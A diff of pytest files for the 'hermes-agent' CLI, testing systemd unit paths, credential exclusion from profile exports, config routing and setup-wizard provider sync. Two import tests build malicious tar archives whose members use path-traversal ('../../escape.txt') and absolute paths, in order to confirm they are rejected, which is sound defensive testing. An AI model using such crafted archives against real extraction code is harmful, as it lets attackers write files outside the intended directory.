monkeypatch.setattr(
|
||||
gateway_cli, "_system_service_identity",
|
||||
lambda run_as_user=None: ("alice", "alice", "/home/alice"),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
gateway_cli, "_build_user_local_paths",
|
||||
lambda home, existing: [],
|
||||
)
|
||||
|
||||
unit = gateway_cli.generate_systemd_unit(system=True, run_as_user="alice")
|
||||
|
||||
assert 'HERMES_HOME=/opt/hermes-shared' in unit
|
||||
|
||||
def test_user_unit_unaffected_by_change(self):
|
||||
# User-scope units should still use the calling user's HERMES_HOME
|
||||
unit = gateway_cli.generate_systemd_unit(system=False)
|
||||
|
||||
hermes_home = str(gateway_cli.get_hermes_home().resolve())
|
||||
assert f'HERMES_HOME={hermes_home}' in unit
|
||||
|
||||
|
||||
class TestHermesHomeForTargetUser:
|
||||
"""Unit tests for _hermes_home_for_target_user()."""
|
||||
|
||||
def test_remaps_default_home(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/home/alice/.hermes"
|
||||
|
||||
def test_remaps_profile_path(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/root/.hermes/profiles/coder")
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/home/alice/.hermes/profiles/coder"
|
||||
|
||||
def test_keeps_custom_path(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/root")))
|
||||
monkeypatch.setenv("HERMES_HOME", "/opt/hermes")
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/opt/hermes"
|
||||
|
||||
def test_noop_when_same_user(self, monkeypatch):
|
||||
monkeypatch.setattr(Path, "home", staticmethod(lambda: Path("/home/alice")))
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
|
||||
result = gateway_cli._hermes_home_for_target_user("/home/alice")
|
||||
assert result == "/home/alice/.hermes"
|
||||
|
||||
|
||||
class TestGeneratedUnitUsesDetectedVenv:
|
||||
def test_systemd_unit_uses_dot_venv_when_detected(self, tmp_path, monkeypatch):
|
||||
dot_venv = tmp_path / ".venv"
|
||||
|
|
|
|||
54
tests/hermes_cli/test_managed_installs.py
Normal file
54
tests/hermes_cli/test_managed_installs.py
Normal file
|
|
@ -0,0 +1,54 @@
|
|||
from types import SimpleNamespace
|
||||
from unittest.mock import patch
|
||||
|
||||
from hermes_cli.config import (
|
||||
format_managed_message,
|
||||
get_managed_system,
|
||||
recommended_update_command,
|
||||
)
|
||||
from hermes_cli.main import cmd_update
|
||||
from tools.skills_hub import OptionalSkillSource
|
||||
|
||||
|
||||
def test_get_managed_system_homebrew(monkeypatch):
|
||||
monkeypatch.setenv("HERMES_MANAGED", "homebrew")
|
||||
|
||||
assert get_managed_system() == "Homebrew"
|
||||
assert recommended_update_command() == "brew upgrade hermes-agent"
|
||||
|
||||
|
||||
def test_format_managed_message_homebrew(monkeypatch):
|
||||
monkeypatch.setenv("HERMES_MANAGED", "homebrew")
|
||||
|
||||
message = format_managed_message("update Hermes Agent")
|
||||
|
||||
assert "managed by Homebrew" in message
|
||||
assert "brew upgrade hermes-agent" in message
|
||||
|
||||
|
||||
def test_recommended_update_command_defaults_to_hermes_update(monkeypatch):
|
||||
monkeypatch.delenv("HERMES_MANAGED", raising=False)
|
||||
|
||||
assert recommended_update_command() == "hermes update"
|
||||
|
||||
|
||||
def test_cmd_update_blocks_managed_homebrew(monkeypatch, capsys):
|
||||
monkeypatch.setenv("HERMES_MANAGED", "homebrew")
|
||||
|
||||
with patch("hermes_cli.main.subprocess.run") as mock_run:
|
||||
cmd_update(SimpleNamespace())
|
||||
|
||||
assert not mock_run.called
|
||||
captured = capsys.readouterr()
|
||||
assert "managed by Homebrew" in captured.err
|
||||
assert "brew upgrade hermes-agent" in captured.err
|
||||
|
||||
|
||||
def test_optional_skill_source_honors_env_override(monkeypatch, tmp_path):
|
||||
optional_dir = tmp_path / "optional-skills"
|
||||
optional_dir.mkdir()
|
||||
monkeypatch.setenv("HERMES_OPTIONAL_SKILLS", str(optional_dir))
|
||||
|
||||
source = OptionalSkillSource()
|
||||
|
||||
assert source._optional_dir == optional_dir
|
||||
52
tests/hermes_cli/test_profile_export_credentials.py
Normal file
52
tests/hermes_cli/test_profile_export_credentials.py
Normal file
|
|
@ -0,0 +1,52 @@
|
|||
"""Tests for credential exclusion during profile export.
|
||||
|
||||
Profile exports should NEVER include auth.json or .env — these contain
|
||||
API keys, OAuth tokens, and credential pool data. Users share exported
|
||||
profiles; leaking credentials in the archive is a security issue.
|
||||
"""
|
||||
|
||||
import tarfile
|
||||
from pathlib import Path
|
||||
|
||||
from hermes_cli.profiles import export_profile, _DEFAULT_EXPORT_EXCLUDE_ROOT
|
||||
|
||||
|
||||
class TestCredentialExclusion:
|
||||
|
||||
def test_auth_json_in_default_exclude_set(self):
|
||||
"""auth.json must be in the default export exclusion set."""
|
||||
assert "auth.json" in _DEFAULT_EXPORT_EXCLUDE_ROOT
|
||||
|
||||
def test_dotenv_in_default_exclude_set(self):
|
||||
""".env must be in the default export exclusion set."""
|
||||
assert ".env" in _DEFAULT_EXPORT_EXCLUDE_ROOT
|
||||
|
||||
def test_named_profile_export_excludes_auth(self, tmp_path, monkeypatch):
|
||||
"""Named profile export must not contain auth.json or .env."""
|
||||
profiles_root = tmp_path / "profiles"
|
||||
profile_dir = profiles_root / "testprofile"
|
||||
profile_dir.mkdir(parents=True)
|
||||
|
||||
# Create a profile with credentials
|
||||
(profile_dir / "config.yaml").write_text("model: gpt-4\n")
|
||||
(profile_dir / "auth.json").write_text('{"tokens": {"access": "sk-secret"}}')
|
||||
(profile_dir / ".env").write_text("OPENROUTER_API_KEY=sk-secret-key\n")
|
||||
(profile_dir / "SOUL.md").write_text("I am helpful.\n")
|
||||
(profile_dir / "memories").mkdir()
|
||||
(profile_dir / "memories" / "MEMORY.md").write_text("# Memories\n")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.profiles._get_profiles_root", lambda: profiles_root)
|
||||
monkeypatch.setattr("hermes_cli.profiles.get_profile_dir", lambda n: profile_dir)
|
||||
monkeypatch.setattr("hermes_cli.profiles.validate_profile_name", lambda n: None)
|
||||
|
||||
output = tmp_path / "export.tar.gz"
|
||||
result = export_profile("testprofile", str(output))
|
||||
|
||||
# Check archive contents
|
||||
with tarfile.open(result, "r:gz") as tf:
|
||||
names = tf.getnames()
|
||||
|
||||
assert any("config.yaml" in n for n in names), "config.yaml should be in export"
|
||||
assert any("SOUL.md" in n for n in names), "SOUL.md should be in export"
|
||||
assert not any("auth.json" in n for n in names), "auth.json must NOT be in export"
|
||||
assert not any(".env" in n for n in names), ".env must NOT be in export"
|
||||
|
|
@ -6,6 +6,7 @@ and shell completion generation.
|
|||
"""
|
||||
|
||||
import json
|
||||
import io
|
||||
import os
|
||||
import tarfile
|
||||
from pathlib import Path
|
||||
|
|
@ -449,10 +450,187 @@ class TestExportImport:
|
|||
with pytest.raises(FileExistsError):
|
||||
import_profile(str(archive_path), name="coder")
|
||||
|
||||
def test_import_rejects_traversal_archive_member(self, profile_env, tmp_path):
|
||||
archive_path = tmp_path / "export" / "evil.tar.gz"
|
||||
archive_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
escape_path = tmp_path / "escape.txt"
|
||||
|
||||
with tarfile.open(archive_path, "w:gz") as tf:
|
||||
info = tarfile.TarInfo("../../escape.txt")
|
||||
data = b"pwned"
|
||||
info.size = len(data)
|
||||
tf.addfile(info, io.BytesIO(data))
|
||||
|
||||
with pytest.raises(ValueError, match="Unsafe archive member path"):
|
||||
import_profile(str(archive_path), name="coder")
|
||||
|
||||
assert not escape_path.exists()
|
||||
assert not get_profile_dir("coder").exists()
|
||||
|
||||
def test_import_rejects_absolute_archive_member(self, profile_env, tmp_path):
|
||||
archive_path = tmp_path / "export" / "evil-abs.tar.gz"
|
||||
archive_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
absolute_target = tmp_path / "abs-escape.txt"
|
||||
|
||||
with tarfile.open(archive_path, "w:gz") as tf:
|
||||
info = tarfile.TarInfo(str(absolute_target))
|
||||
data = b"pwned"
|
||||
info.size = len(data)
|
||||
tf.addfile(info, io.BytesIO(data))
|
||||
|
||||
with pytest.raises(ValueError, match="Unsafe archive member path"):
|
||||
import_profile(str(archive_path), name="coder")
|
||||
|
||||
assert not absolute_target.exists()
|
||||
assert not get_profile_dir("coder").exists()
|
||||
|
||||
def test_export_nonexistent_raises(self, profile_env, tmp_path):
|
||||
with pytest.raises(FileNotFoundError):
|
||||
export_profile("nonexistent", str(tmp_path / "out.tar.gz"))
|
||||
|
||||
# ---------------------------------------------------------------
|
||||
# Default profile export / import
|
||||
# ---------------------------------------------------------------
|
||||
|
||||
def test_export_default_creates_valid_archive(self, profile_env, tmp_path):
|
||||
"""Exporting the default profile produces a valid tar.gz."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("model: test")
|
||||
|
||||
output = tmp_path / "export" / "default.tar.gz"
|
||||
output.parent.mkdir(parents=True, exist_ok=True)
|
||||
result = export_profile("default", str(output))
|
||||
|
||||
assert Path(result).exists()
|
||||
assert tarfile.is_tarfile(str(result))
|
||||
|
||||
def test_export_default_includes_profile_data(self, profile_env, tmp_path):
|
||||
"""Profile data files end up in the archive (credentials excluded)."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("model: test")
|
||||
(default_dir / ".env").write_text("KEY=val")
|
||||
(default_dir / "SOUL.md").write_text("Be nice.")
|
||||
mem_dir = default_dir / "memories"
|
||||
mem_dir.mkdir(exist_ok=True)
|
||||
(mem_dir / "MEMORY.md").write_text("remember this")
|
||||
|
||||
output = tmp_path / "export" / "default.tar.gz"
|
||||
output.parent.mkdir(parents=True, exist_ok=True)
|
||||
export_profile("default", str(output))
|
||||
|
||||
with tarfile.open(str(output), "r:gz") as tf:
|
||||
names = tf.getnames()
|
||||
|
||||
assert "default/config.yaml" in names
|
||||
assert "default/.env" not in names # credentials excluded
|
||||
assert "default/SOUL.md" in names
|
||||
assert "default/memories/MEMORY.md" in names
|
||||
|
||||
def test_export_default_excludes_infrastructure(self, profile_env, tmp_path):
|
||||
"""Repo checkout, worktrees, profiles, databases are excluded."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("ok")
|
||||
|
||||
# Create dirs/files that should be excluded
|
||||
for d in ("hermes-agent", ".worktrees", "profiles", "bin",
|
||||
"image_cache", "logs", "sandboxes", "checkpoints"):
|
||||
sub = default_dir / d
|
||||
sub.mkdir(exist_ok=True)
|
||||
(sub / "marker.txt").write_text("excluded")
|
||||
|
||||
for f in ("state.db", "gateway.pid", "gateway_state.json",
|
||||
"processes.json", "errors.log", ".hermes_history",
|
||||
"active_profile", ".update_check", "auth.lock"):
|
||||
(default_dir / f).write_text("excluded")
|
||||
|
||||
output = tmp_path / "export" / "default.tar.gz"
|
||||
output.parent.mkdir(parents=True, exist_ok=True)
|
||||
export_profile("default", str(output))
|
||||
|
||||
with tarfile.open(str(output), "r:gz") as tf:
|
||||
names = tf.getnames()
|
||||
|
||||
# Config is present
|
||||
assert "default/config.yaml" in names
|
||||
|
||||
# Infrastructure excluded
|
||||
excluded_prefixes = [
|
||||
"default/hermes-agent", "default/.worktrees", "default/profiles",
|
||||
"default/bin", "default/image_cache", "default/logs",
|
||||
"default/sandboxes", "default/checkpoints",
|
||||
]
|
||||
for prefix in excluded_prefixes:
|
||||
assert not any(n.startswith(prefix) for n in names), \
|
||||
f"Expected {prefix} to be excluded but found it in archive"
|
||||
|
||||
excluded_files = [
|
||||
"default/state.db", "default/gateway.pid",
|
||||
"default/gateway_state.json", "default/processes.json",
|
||||
"default/errors.log", "default/.hermes_history",
|
||||
"default/active_profile", "default/.update_check",
|
||||
"default/auth.lock",
|
||||
]
|
||||
for f in excluded_files:
|
||||
assert f not in names, f"Expected {f} to be excluded"
|
||||
|
||||
def test_export_default_excludes_pycache_at_any_depth(self, profile_env, tmp_path):
|
||||
"""__pycache__ dirs are excluded even inside nested directories."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("ok")
|
||||
nested = default_dir / "skills" / "my-skill" / "__pycache__"
|
||||
nested.mkdir(parents=True)
|
||||
(nested / "cached.pyc").write_text("bytecode")
|
||||
|
||||
output = tmp_path / "export" / "default.tar.gz"
|
||||
output.parent.mkdir(parents=True, exist_ok=True)
|
||||
export_profile("default", str(output))
|
||||
|
||||
with tarfile.open(str(output), "r:gz") as tf:
|
||||
names = tf.getnames()
|
||||
|
||||
assert not any("__pycache__" in n for n in names)
|
||||
|
||||
def test_import_default_without_name_raises(self, profile_env, tmp_path):
|
||||
"""Importing a default export without --name gives clear guidance."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("ok")
|
||||
|
||||
archive = tmp_path / "export" / "default.tar.gz"
|
||||
archive.parent.mkdir(parents=True, exist_ok=True)
|
||||
export_profile("default", str(archive))
|
||||
|
||||
with pytest.raises(ValueError, match="Cannot import as 'default'"):
|
||||
import_profile(str(archive))
|
||||
|
||||
def test_import_default_with_explicit_default_name_raises(self, profile_env, tmp_path):
|
||||
"""Explicitly importing as 'default' is also rejected."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("ok")
|
||||
|
||||
archive = tmp_path / "export" / "default.tar.gz"
|
||||
archive.parent.mkdir(parents=True, exist_ok=True)
|
||||
export_profile("default", str(archive))
|
||||
|
||||
with pytest.raises(ValueError, match="Cannot import as 'default'"):
|
||||
import_profile(str(archive), name="default")
|
||||
|
||||
def test_import_default_export_with_new_name_roundtrip(self, profile_env, tmp_path):
|
||||
"""Export default → import under a different name → data preserved."""
|
||||
default_dir = get_profile_dir("default")
|
||||
(default_dir / "config.yaml").write_text("model: opus")
|
||||
mem_dir = default_dir / "memories"
|
||||
mem_dir.mkdir(exist_ok=True)
|
||||
(mem_dir / "MEMORY.md").write_text("important fact")
|
||||
|
||||
archive = tmp_path / "export" / "default.tar.gz"
|
||||
archive.parent.mkdir(parents=True, exist_ok=True)
|
||||
export_profile("default", str(archive))
|
||||
|
||||
imported = import_profile(str(archive), name="backup")
|
||||
assert imported.is_dir()
|
||||
assert (imported / "config.yaml").read_text() == "model: opus"
|
||||
assert (imported / "memories" / "MEMORY.md").read_text() == "important fact"
|
||||
|
||||
|
||||
# ===================================================================
|
||||
# TestProfileIsolation
|
||||
|
|
|
|||
|
|
@ -1,12 +1,13 @@
|
|||
"""Tests for set_config_value — verifying secrets route to .env and config to config.yaml."""
|
||||
|
||||
import argparse
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch, call
|
||||
|
||||
import pytest
|
||||
|
||||
from hermes_cli.config import set_config_value
|
||||
from hermes_cli.config import set_config_value, config_command
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
|
|
@ -125,3 +126,42 @@ class TestConfigYamlRouting:
|
|||
"TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE=true" in env_content
|
||||
or "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE=True" in env_content
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Empty / falsy values — regression tests for #4277
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestFalsyValues:
|
||||
"""config set should accept empty strings and falsy values like '0'."""
|
||||
|
||||
def test_empty_string_routes_to_env(self, _isolated_hermes_home):
|
||||
"""Blanking an API key should write an empty value to .env."""
|
||||
set_config_value("OPENROUTER_API_KEY", "")
|
||||
env_content = _read_env(_isolated_hermes_home)
|
||||
assert "OPENROUTER_API_KEY=" in env_content
|
||||
|
||||
def test_empty_string_routes_to_config(self, _isolated_hermes_home):
|
||||
"""Blanking a config key should write an empty string to config.yaml."""
|
||||
set_config_value("model", "")
|
||||
config = _read_config(_isolated_hermes_home)
|
||||
assert "model: ''" in config or "model: \"\"" in config
|
||||
|
||||
def test_zero_routes_to_config(self, _isolated_hermes_home):
|
||||
"""Setting a config key to '0' should write 0 to config.yaml."""
|
||||
set_config_value("verbose", "0")
|
||||
config = _read_config(_isolated_hermes_home)
|
||||
assert "verbose: 0" in config
|
||||
|
||||
def test_config_command_rejects_missing_value(self):
|
||||
"""config set with no value arg (None) should still exit."""
|
||||
args = argparse.Namespace(config_command="set", key="model", value=None)
|
||||
with pytest.raises(SystemExit):
|
||||
config_command(args)
|
||||
|
||||
def test_config_command_accepts_empty_string(self, _isolated_hermes_home):
|
||||
"""config set KEY '' should not exit — it should set the value."""
|
||||
args = argparse.Namespace(config_command="set", key="model", value="")
|
||||
config_command(args)
|
||||
config = _read_config(_isolated_hermes_home)
|
||||
assert "model" in config
|
||||
|
|
|
|||
|
|
@ -1,8 +1,10 @@
|
|||
"""Tests for setup_model_provider — verifies the delegation to
|
||||
select_provider_and_model() and config dict sync."""
|
||||
import json
|
||||
import sys
|
||||
import types
|
||||
|
||||
from hermes_cli.auth import _update_config_for_provider, get_active_provider
|
||||
from hermes_cli.auth import get_active_provider
|
||||
from hermes_cli.config import load_config, save_config
|
||||
from hermes_cli.setup import setup_model_provider
|
||||
|
||||
|
|
@ -25,249 +27,201 @@ def _clear_provider_env(monkeypatch):
|
|||
monkeypatch.delenv(key, raising=False)
|
||||
|
||||
|
||||
def _stub_tts(monkeypatch):
|
||||
"""Stub out TTS prompts so setup_model_provider doesn't block."""
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", lambda q, c, d=0: (
|
||||
_maybe_keep_current_tts(q, c) if _maybe_keep_current_tts(q, c) is not None
|
||||
else d
|
||||
))
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *a, **kw: False)
|
||||
|
||||
def test_nous_oauth_setup_keeps_current_model_when_syncing_disk_provider(
|
||||
tmp_path, monkeypatch
|
||||
):
|
||||
|
||||
def _write_model_config(tmp_path, provider, base_url="", model_name="test-model"):
|
||||
"""Simulate what a _model_flow_* function writes to disk."""
|
||||
cfg = load_config()
|
||||
m = cfg.get("model")
|
||||
if not isinstance(m, dict):
|
||||
m = {"default": m} if m else {}
|
||||
cfg["model"] = m
|
||||
m["provider"] = provider
|
||||
if base_url:
|
||||
m["base_url"] = base_url
|
||||
if model_name:
|
||||
m["default"] = model_name
|
||||
save_config(cfg)
|
||||
|
||||
|
||||
def test_setup_delegates_to_select_provider_and_model(tmp_path, monkeypatch):
|
||||
"""setup_model_provider calls select_provider_and_model and syncs config."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 1 # Nous Portal
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
if question == "Select default model:":
|
||||
assert choices[-1] == "Keep current (anthropic/claude-opus-4.6)"
|
||||
return len(choices) - 1
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
def fake_select():
|
||||
_write_model_config(tmp_path, "custom", "http://localhost:11434/v1", "qwen3.5:32b")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
|
||||
def _fake_login_nous(*args, **kwargs):
|
||||
auth_path = tmp_path / "auth.json"
|
||||
auth_path.write_text(json.dumps({"active_provider": "nous", "providers": {}}))
|
||||
_update_config_for_provider("nous", "https://inference.example.com/v1")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.auth._login_nous", _fake_login_nous)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_nous_runtime_credentials",
|
||||
lambda *args, **kwargs: {
|
||||
"base_url": "https://inference.example.com/v1",
|
||||
"api_key": "nous-key",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.fetch_nous_models",
|
||||
lambda *args, **kwargs: ["gemini-3-flash"],
|
||||
)
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "custom"
|
||||
assert reloaded["model"]["base_url"] == "http://localhost:11434/v1"
|
||||
assert reloaded["model"]["default"] == "qwen3.5:32b"
|
||||
|
||||
|
||||
def test_setup_syncs_openrouter_from_disk(tmp_path, monkeypatch):
|
||||
"""When select_provider_and_model saves OpenRouter config to disk,
|
||||
the wizard's config dict picks it up."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
assert isinstance(config.get("model"), str) # fresh install
|
||||
|
||||
def fake_select():
|
||||
_write_model_config(tmp_path, "openrouter", model_name="anthropic/claude-opus-4.6")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "openrouter"
|
||||
|
||||
|
||||
def test_setup_syncs_nous_from_disk(tmp_path, monkeypatch):
|
||||
"""Nous OAuth writes config to disk; wizard config dict must pick it up."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_select():
|
||||
_write_model_config(tmp_path, "nous", "https://inference.example.com/v1", "gemini-3-flash")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "nous"
|
||||
assert reloaded["model"]["base_url"] == "https://inference.example.com/v1"
|
||||
assert reloaded["model"]["default"] == "anthropic/claude-opus-4.6"
|
||||
|
||||
|
||||
def test_custom_setup_clears_active_oauth_provider(tmp_path, monkeypatch):
|
||||
def test_setup_custom_providers_synced(tmp_path, monkeypatch):
|
||||
"""custom_providers written by select_provider_and_model must survive."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
|
||||
auth_path = tmp_path / "auth.json"
|
||||
auth_path.write_text(json.dumps({"active_provider": "nous", "providers": {}}))
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 3
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
def fake_select():
|
||||
_write_model_config(tmp_path, "custom", "http://localhost:8080/v1", "llama3")
|
||||
cfg = load_config()
|
||||
cfg["custom_providers"] = [{"name": "Local", "base_url": "http://localhost:8080/v1"}]
|
||||
save_config(cfg)
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
|
||||
# _model_flow_custom uses builtins.input (URL, key, model, context_length)
|
||||
input_values = iter([
|
||||
"https://custom.example/v1",
|
||||
"custom-api-key",
|
||||
"custom/model",
|
||||
"", # context_length (blank = auto-detect)
|
||||
])
|
||||
monkeypatch.setattr("builtins.input", lambda _prompt="": next(input_values))
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.main._save_custom_provider", lambda *args, **kwargs: None)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.models.probe_api_models",
|
||||
lambda api_key, base_url: {"models": ["m"], "probed_url": base_url + "/models"},
|
||||
)
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
# Core assertion: switching to custom endpoint clears OAuth provider
|
||||
assert get_active_provider() is None
|
||||
|
||||
# _model_flow_custom writes config via its own load/save cycle
|
||||
reloaded = load_config()
|
||||
if isinstance(reloaded.get("model"), dict):
|
||||
assert reloaded["model"].get("provider") == "custom"
|
||||
assert reloaded["model"].get("default") == "custom/model"
|
||||
|
||||
|
||||
def test_codex_setup_uses_runtime_access_token_for_live_model_list(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-test-key")
|
||||
_clear_provider_env(monkeypatch)
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-test-key")
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_prompt_choice(question, choices, default=0):
|
||||
if question == "Select your inference provider:":
|
||||
return 2 # OpenAI Codex
|
||||
if question == "Configure vision:":
|
||||
return len(choices) - 1
|
||||
if question == "Select default model:":
|
||||
return 0
|
||||
tts_idx = _maybe_keep_current_tts(question, choices)
|
||||
if tts_idx is not None:
|
||||
return tts_idx
|
||||
raise AssertionError(f"Unexpected prompt_choice call: {question}")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.auth._login_openai_codex", lambda *args, **kwargs: None)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_codex_runtime_credentials",
|
||||
lambda *args, **kwargs: {
|
||||
"base_url": "https://chatgpt.com/backend-api/codex",
|
||||
"api_key": "codex-access-token",
|
||||
},
|
||||
)
|
||||
|
||||
captured = {}
|
||||
|
||||
def _fake_get_codex_model_ids(access_token=None):
|
||||
captured["access_token"] = access_token
|
||||
return ["gpt-5.2-codex", "gpt-5.2"]
|
||||
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.codex_models.get_codex_model_ids",
|
||||
_fake_get_codex_model_ids,
|
||||
)
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert reloaded.get("custom_providers") == [{"name": "Local", "base_url": "http://localhost:8080/v1"}]
|
||||
|
||||
assert captured["access_token"] == "codex-access-token"
|
||||
|
||||
def test_setup_cancel_preserves_existing_config(tmp_path, monkeypatch):
|
||||
"""When the user cancels provider selection, existing config is preserved."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
# Pre-set a provider
|
||||
_write_model_config(tmp_path, "openrouter", model_name="gpt-4o")
|
||||
|
||||
config = load_config()
|
||||
assert config["model"]["provider"] == "openrouter"
|
||||
|
||||
def fake_select():
|
||||
pass # user cancelled — nothing written to disk
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "openrouter"
|
||||
assert reloaded["model"]["default"] == "gpt-4o"
|
||||
|
||||
|
||||
def test_setup_exception_in_select_gracefully_handled(tmp_path, monkeypatch):
|
||||
"""If select_provider_and_model raises, setup continues with existing config."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_select():
|
||||
raise RuntimeError("something broke")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
# Should not raise
|
||||
setup_model_provider(config)
|
||||
|
||||
|
||||
def test_setup_keyboard_interrupt_gracefully_handled(tmp_path, monkeypatch):
|
||||
"""KeyboardInterrupt during provider selection is handled."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_select():
|
||||
raise KeyboardInterrupt()
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
|
||||
def test_codex_setup_uses_runtime_access_token_for_live_model_list(tmp_path, monkeypatch):
|
||||
"""Codex model list fetching uses the runtime access token."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-test-key")
|
||||
